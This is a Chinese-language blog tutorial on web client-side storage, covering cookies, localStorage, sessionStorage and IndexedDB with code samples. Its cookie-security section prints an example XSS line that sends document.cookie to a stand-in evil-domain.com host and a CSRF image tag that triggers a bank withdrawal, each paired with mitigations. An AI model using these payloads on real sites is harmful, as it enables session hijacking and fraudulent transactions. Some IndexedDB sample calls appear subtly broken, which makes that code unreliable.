一篇理清Web的用户端存储

最新推荐文章于 2021-09-16 20:15:51 发布
最新推荐文章于 2021-09-16 20:15:51 发布
阅读量224 收藏
点赞数
分类专栏: 前端 缓存 文章标签: 前端 localstorage indexDB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gdutRex/article/details/101002892
版权

用户端存储

为了减少HTTP请求和实现维持服务器和客户端的状态联系,就需要用户端存储数据。
有了这个,才能让静态网页迈向了动态网页和离线网页的变化。

文章目录

cookies

HTTP Cookie(也叫Web Cookie或浏览器Cookie)是服务器发送到用户浏览器并保存在本地的一小块数据。
Cookie使基于无状态的HTTP协议记录稳定的状态信息成为了可能。
由于服务器指定Cookie后,浏览器的每次请求都会携带Cookie数据,会带来额外的性能开销(尤其是在移动环境下)。

  • 会话状态管理(如用户登录状态、购物车、游戏分数或其它需要记录的信息)
  • 个性化设置(如用户自定义设置、主题等)
  • 浏览器行为跟踪(如跟踪分析用户行为等)

创建cookie

服务器收到HTTP请求时,服务器可以在响应头里面添加一个Set-Cookie选项。浏览器收到响应后通常会保存下Cookie,之后对该服务器每一次请求中都通过Cookie请求头部将Cookie信息发送给服务器。
Set-Cookie: <cookie名>=<cookie值>
服务器端设置cookie

  • 在响应报文是这样显示的:
    HTTP/1.0 200 OK
Content-type: text/html
Set-Cookie: yummy_cookie=choco
Set-Cookie: tasty_cookie=strawberry
  • 请求报文
    GET /sample_page.html HTTP/1.1
Host: www.example.org
Cookie: yummy_cookie=choco; tasty_cookie=strawberry

session cookie

会话期Cookie是最简单的Cookie:浏览器关闭之后它会被自动删除,也就是说它仅在会话期内有效。

持久的cookie

持久性Cookie可以指定一个特定的过期时间(Expires)或有效期(Max-Age)。
Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2019 07:28:00 GMT;

Secure 和HttpOnly 标记

标记为 ·Secure 的Cookie只应通过被HTTPS协议加密过的请求发送给服务端。
为避免跨域脚本 (XSS) 攻击,通过JavaScript的 Document.cookie API无法访问带有 ·HttpOnly标记的Cookie,它们只应该发送给服务端。
Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly

作用域

DomainPath 标识定义了Cookie的作用域:即Cookie应该发送给哪些URL。

  • Domain 标识指定了哪些主机可以接受Cookie。如果不指定,默认为当前文档的主机(不包含子域名)。如果指定了Domain,则一般包含子域名。
  • Path 标识指定了主机下的哪些路径可以接受Cookie(该URL路径必须存在于请求URL中)。以字符 %x2F ("/") 作为路径分隔符,子路径也会被匹配。例如,设置·Path=/docs

DOM访问cookie

通过Document.cookie属性可创建新的Cookie,也可通过该属性访问非HttpOnly标记的Cookie

document.cookie = "yummy_cookie=choco"; 
document.cookie = "tasty_cookie=strawberry"; 
console.log(document.cookie);

cookie的安全问题

  1. 会话劫持和XSS
    常用的窃取Cookie的方法有利用社会工程学攻击和利用应用程序漏洞进行XSS攻击。
    (new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;
    HttpOnly类型的Cookie由于阻止了JavaScript对其的访问性而能在一定程度上缓解此类攻击。
  2. 跨站请求伪造(CSRF)
    比如在不安全聊天室或论坛上的一张图片,它实际上是一个给你银行服务器发送提现的请求:
    <img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">
    当你打开含有了这张图片的HTML页面时,如果你之前已经登录了你的银行帐号并且Cookie仍然有效(还没有其它验证步骤),你银行里的钱很可能会被自动转走。
    • 对用户输入进行过滤来阻止XSS;
    • 任何敏感操作都需要确认;
    • 用于敏感信息的Cookie只能拥有较短的生命周期;

Storage

兼容性:IE8+ chrome safari4+

localStorage

在浏览器关闭,然后重新打开后数据仍然存在。
通过Window.localStorage 属性来实现。

  • 权限:同一个DOM源的网页才能访问
  • 方法
    1. 增/改:·localStorage.setItem('myCat', 'Tom');
    2. 获取:let cat = localStorage.getItem('myCat');
    3. 删除:localStorage.removeItem('myCat');
    4. 清空:localStorage.clear();
  • 事件
    设置storage事件,可以监听本地缓存的变化。

sessionStorage

当页面关闭,sessionStorage就会清空。

  • 权限:允许你访问一个 session Storage 对象。
  • 方法
    1. 增/改:·sessionStorage.setItem('myCat', 'Tom');
    2. 获取:let cat = sessionStorage.getItem('myCat');
    3. 删除:sessionStorage.removeItem('myCat');
    4. 清空:sessionStorage.clear();

IndexedDB

兼容性:IE10+ chrome safari24+

解决大文件缓存,如同名字一样,索引存储。通过索引指向缓存文件,对于保存大文件和大数据来说是性能比较高的。

MDN的概念解释

IndexedDB是一个事务型数据库系统,类似于基于SQL的RDBMS。 然而,不像RDBMS使用固定列表,IndexedDB是一个基于JavaScript的面向对象的数据库。 IndexedDB允许您存储和检索用键索引的对象;可以存储结构化克隆算法支持的任何对象。 您只需要指定数据库模式,打开与数据库的连接,然后检索和更新一系列事务。

大概意思就是使用一种面向对象的思想来管理这些大文件的存储,提供使用这些缓存的性能。

接口

  1. 打开数据库
    var  db = null
 var DBOpenRequest = window.indexedDB.open("toDoList");
 DBOpenRequest.onsuccess = function(e) {
   db = DBOpenRequest.result;
 };
    这里打开成功的时候会有一个,参数DBRequest保存着回调信息。
    每一个请求都有一个·readyState属性,初始时为pending,当请求完成或失败的时候,readyState会变为done
    • 当状态保持为·done时,每一个请求都会返回resulterror属性,并且会触发一个事件.
    • 当状态保持为pending时,任何尝试访问result或error属性的行为会触发一个InvalidStateError异常。

所有的异步操作都会返回一个request对象。成功的时候会触发 success,失败触发error,异步的结果会保存到result属性。

request.onsuccess = function(event) {
        var db = this.result;// request.result
        var transaction = db.transaction([]);
// "readonly" is the default option; 
// when data will be added to the database use "readwrite".
        var curRequest = transaction.objectStore('ObjectStore Name').openCursor();
        curRequest.onsuccess = ...;
    };

可以通过this.result或者直接访问request.result;

  1. 创建索引集

    打开数据库成功的时候,result保存的就是访问对应数据库的·IDBDatabase接口。我们后续的操作都是通过它来进行。
    比如:
    1. 关闭数据库:this.result.close()
    2. 添加一个索引集:this.result.createObjectStore(name,option)
    option是可选配置,具体可以阅读MDN文档
    3. 删除索引集:this.result.deleteObjectStore(name);

  1. 往索引集添加数据
    数据的读取都是通过一个objectStore接口进行的。
    当我们创建索引集的时候会返回一个当前索引集的objectStore接口
    我们想要打开特定的索引集,可以使用request.result.transaction(['fThings'], 'readonly').objectStore('fThings');

这个接口有自己的属性和方法,但是我们这里直接介绍下常用的方法,其他可以阅读MDN文档
1. 创建索引:objectStore.createIndex("hours", "hours", { unique: false });前面2个是索引名字和键路径,第3个是配置。
2. 删除索引值:objectStore.delete("name");
3. 删除索引:objectStore.deleteIndex(indexName);
4. 增加值(插入):objectStore.add(value, key);key是唯一标识的值,默认为null,如果值已经存在则会触发error事件
5. 获取值:objectStore.get(key);
6. 修改值:objectStore.put(item, key);

使用例子:
// 创建一个数据库
var DBOpenRequest = window.indexedDB.open("toDoList", 4);
DBOpenRequest.onsuccess = function(event) {
  // 保存返回的DBResult
  db = DBOpenRequest.result;
};
// 当版本更新或者首次创建的时候触发
DBOpenRequest.onupgradeneeded = function(event) {
  var db = event.target.result;
  db.onerror = function(event) {
    note.innerHTML += '<li>Error loading database.</li>';
  }
  // 创建索引集,以taskTitle为数据的索引
  var objectStore = db.createObjectStore("toDoList", { keyPath: "taskTitle" });
  // 自定义索引
  objectStore.createIndex("hours", "hours", { unique: false });
  objectStore.createIndex("minutes", "minutes", { unique: false });
  objectStore.createIndex("day", "day", { unique: false });
  objectStore.createIndex("month", "month", { unique: false });
  objectStore.createIndex("year", "year", { unique: false });
  objectStore.createIndex("notified", "notified", { unique: false });
  note.innerHTML += '<li>Object store created.</li>';
};
// 需要保存的数据
var newItem = [
  { taskTitle: "Walk dog", hours: 19, minutes: 30, day: 24, month: 'December', year: 2013, notified: "no" }
];
// 打开索引集
var transaction = db.transaction(["toDoList"], "readwrite");
// 打开objectStore接口
var objectStore = transaction.objectStore("toDoList");
// 将值添加上去
var objectStoreRequest = objectStore.add(newItem[0]);  
// 设置回调 监听是否完成
objectStoreRequest.onsuccess = function(event) {
  note.innerHTML += '<li>Request successful .</li>';
} 
// 获取值
let store = db.transaction("toDoList").objectStore("toDoList");
let request = store.get(IDBKeyRange('year', 'month'));
request.onsuccess = (event) => {
	let data= event.target.result;
    alert("data get success" + data);
};
// 获取索引
 store.getKey(IDBKeyRange(30, 24));
 // 修改值
// 需要重新获取值
request = store.get('Walk dog');
request.onsuccess = (event) => {
	let data= event.target.result;
	data.year = 2019
	var  updateTitleRequest = objectStore.put(data);
	updateTitleRequest.onsuccess = function() {
     	alert("data put success" );
  	};
};

service worker

这个原理是劫持HTTP请求,可以将获取的信息保存到本地,来进行离线缓存的效果。这个在我上一篇文章已经介绍了,有兴趣的同学可以去阅读

Shopee_Rex
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web应用开发实验报告.pdf
06-28
西安建筑科技大学的《Web应用开发实验报告》涵盖了三个实验:用户管理系统、命令行界面、数据库以及静态网页设计。通过这些实验,学生孙嘉成在软件工程专业课程中实践了Web应用开发的多项基本技能。 在第一个实验中...
HTML5与移动Web开发:数据存储
燕双嘤
12-02 1000
WebStorage:使用HTML5可以在本地存储用户的浏览数据。早些时候,本地存储使用的是 cookie。但是Web 存储需要更加的安全与快速,这些数据不会被保存在服务器上,但是这些数据只用于用户请求网站数据上。它也可以存储大量的数据,而不影响网站的性能。数据以 键/值 对存在,web网页的数据只允许该网页访问使用。Web Storage又分为两种: sessionStorage 和localStorage
Web客户端的几种存储方式
Lance2574的博客
09-16 3524
一、Cookie存储 在H5之前,Cookie是主要的存储方式。他的主要用途是保存登录信息,可以设置存储的有效期。 存储在浏览器中,每次浏览器向服务器发送请求都需要携带cookie,一般情况下,cookie是产生于服务器端,保存于客户端,但是我们也可以通过js来产生cookie。 通常通过js-cookie这个库来操作cookie <scriptsrc="https://cdn.bootcdn.net/ajax/libs/js-cookie/latest/js.cookie.js">.
web程序客户端存储数据的常用方法
xiaoxin
05-19 612
客户端存储   在web开发中,说到客户端数据存储,可能第一时间想到的是cookies,这是一种web开发常见的客户端存储数据的方法。它的最大优点是兼容性好,几乎所有浏览器都具有这个功能。缺点是存储量太小(4k)、数据访问不够灵活。随着Ajax的兴起和离线应用需求的增加,对本地数据存储的需求已经不是cookie可以满足的了。 从ie5+和firefox2+的web开发中,除了通用的cookie,本...
浅析Web数据存储-Cookie、UserData、SessionStorage、WebSqlDatabase
08-05 215
Cookie 它是标准的客户端浏览器状态保存方式,可能在浏览器诞生不久就有Cookie了,为什么需要Cookie 这个东东?由于HTTP协议没有状态,所以需要一个标志/存储来记录客户浏览器当前的状态,保证客户浏览器和服务器通讯时可以知道客户浏览器当前的状态。Cookie就是记录这个状态的容器,Cookie在每次请求的时候都被带回到服务器,从而保证了Server可以知道浏览器当前的状态...
web浏览器数据本地存储
zlingyun的博客
07-17 1万+
在浏览器中存储主要分为以下三种方式 localstorage 2、sessionStorage 3、cookie   localStorage 生命周期永久,除非用户清除浏览器中的localStorage信息,否则永远存在; 存放数据大小一般为5MB; 仅在浏览器中保存,不参与服务器通信; API调用:     localStorage.setItem("key","value");...
web网页设计方案报告.doc
11-18
Web 网页设计方案报告 基于提供的文档,以下是从标题、描述、标签和部分内容中提取的相关知识点: 一、网页设计的重要性 * 21 世纪是一个信息时代,Internet 已经进入人们生活与工作的各方面 * 网页作为 Internet...
Web实验报告课程设计.doc
11-23
本文档是Web实验报告课程设计的文档,旨在通过制作一个网站来满足实验大纲要求。整个网站的设计和开发过程分为七个步骤:明确需求、下载图片和文本、构建框架、敲入代码、页面调整和优化、美观加工、代码封装和标注...
一文理清ApacheSpark内存管理脉络
02-25
Spark作为一个基于内存的分布式计算引擎,其内存管理模块在整个系统中扮演着非常重要的角色。理解conSpark内存管理的基本原理,有助于更好地开发Spark应用程序和进行性能调优。在执行Spark的应用程序时,Spark集群会...
web客户端存储小结
muxin_hgk的博客
02-16 706
1.客户端存储的主要形式包括:web存储、cookie、IE userData、离线web应用、web数据库和文件系统API;2.web存储localStorage和sessionStorage    localStorage和sessionStorage是window对象上定义的两个属性,支持大容量数据存储。这两个属性都代表同一个Storage对象--一个持久化关联数组。数组使用字符串来索引,...
Web客户端编程
zrx1832的博客
10-31 1337
使用HTML超文本标记语言制作简单页面,要求通过实验能够掌握HTML文件的基本结构和文档的创建、编辑及保存。 验证并掌握HTML超文本标记语言的文本、图像、超链接、表格、表单等标记的使用。 通过实验掌握层叠样式表CSS的创建及应用,掌握在网页中插入层叠样式表CSS的常用方法,掌握层叠样式表CSS的主要基本属性的使用。 通过实验了解JavaScript的编程规范及基本语法,能够分析JavaSc...
web数据存储的4种方法
u011539729的博客
12-02 7799
概述
从0开始搭建一个疫情地图小程序——小程序篇
热门推荐
gdutRex的博客
03-10 1万+
为什么选小程序 主要还是服务器的费用的问题,小程序开发结合云服务器可以省掉很多运维的问题,加上我这次开发主要是为了熟悉小程序的组件开发与echart在小程序绘制地图的性能表现。 前端页面展示 首页 切换页面 各地详细页面 源代码 前端实现 这里并不全部讲前端的代码,主要讲我在开发的时候遇到的坑。 组件开发 拿我首页上,每天数据的显示,我将它封装为一个组件。 和VUE框架有很多的相同点,比如......
Buffer() is deprecated due to security and usability issues.webpack 报错
gdutRex的博客
12-25 7439
问题描述: 有时候打包的时候会不时地报错 Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead. 看了下webpack的文件,发现了问题。由于使用了new ...
移动端echarts的tooltip点击图表外部隐藏
gdutRex的博客
01-12 5780
描述 在移动端没有hover事件,所以触发echart的高亮事件只有点击事件,这个时候如果有页面滚动事件的时候,滚动的时候并不能隐藏tooltip。 这个时候页面滚动是不会隐藏的。 除此之外,如果页面同时多个图表,这个时候会出现多个tooltip,这个产品认为可能体验会比较不好,希望能够一个页面只高亮一个图表。 方案 需要做到跨图表状态管理,很明显选择使用vuex来存储状态是比较方便。所以这里使用vuex来存储图表直接是否存在高亮的属性。 同时为了引入方便,这里使用mixin来专门处理这个属性值的变化。
vscode中prettier与eslint一起使用格式化时候会报错
gdutRex的博客
08-26 3456
代码风格与代码检测冲突 我们经常使用prettier与eslint进行代码格式化与代码检测,但是经常遇见格式化之后依然存在代码检测的异常,这主要是因为eslint的配置没有与prettier的规则设置为相同。 我查看了网上给的设置都比较过时了,prettier官方提供了一个新的方法 例子 通过prettier格式化之后,报错 设置方法 首先在vscode的setting.json中添加prettier的设置 "editor.codeActionsOnSave": { // For ESLi
VUE中使用localStorage实现跨标签页面的通信
gdutRex的博客
10-22 3413
前言 目前出现了一个需求,需要父页面打开新的子页面,子页面提交表单之后,关闭子页面,然后把数据返回给父页面。 本来考虑使用sharedWorker,但是由于兼容性太差了,就弃用了。看到网上的介绍可以使用localStorage来实现,我就尝试了下。下面是一些具体的细节。 开始 整体流程如图所示: 需求分析 子页面需要知道自己的父页面对应的是谁,所以父页面打开子页面的时候需要传输一个父页面的KEY值 由于表单是使用dialog来显示,需要注意避免出现事件重复注册的,及时销毁事件,保留监听事件的唯一。 由于
前端乾坤(qiankun)初尝试
gdutRex的博客
03-01 3126
介绍 qiankun 是一个基于 single-spa 的微前端实现库,旨在帮助大家能更简单、无痛的构建一个生产可用微前端架构系统。 公司有一个门户网站需要嵌入其他系统,使用iframe会有很多的兼容性问题,如果使用qiankun框架,不仅可以绕过这些iframe的坑,还可以进行很多的“骚操作”。 快速上手 qiankun官网的快速上手很简单,不是因为他们懒得写,而是引入qiankun的确是非常简单。 只需要在主应用中引入qiankun,微服务做相应的配置,就可以,下面就介绍我在项目中如何引入。 主应用
引入codemirror时报错,webpack中resolve.extensions配置产生的问题
gdutRex的博客
08-31 3081
问题 在引入codemirror的时候,找不到对应的CodeMirror对应的函数。原因在于在CodeMirror库中lib的CodeMirror文件有2个,相同的名字。 举个例子,在CodeMirror/mode/javascript下的任一个js文件,都是报错的。 这里引入了lib/CodeMirror,分析了下,是传入的CodeMirror缺失了对应的方法 我们输出JS文件引入的情况。 发现了如果没有指名后缀的话,无法找到正确的文件。 这个导致的原因是lib文件夹下存在2个相同名字的文件。
keil5如何快速理清工程
最新发布
07-14
然后选择项目的存储路径和名称,并选择目标设备。 2. 添加源文件:在项目资源管理器中,右键点击 "Source Group",选择 "Add New Item to Group"。然后选择要添加的源文件,并将其包含在工程中。 3. 配置目标设备...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值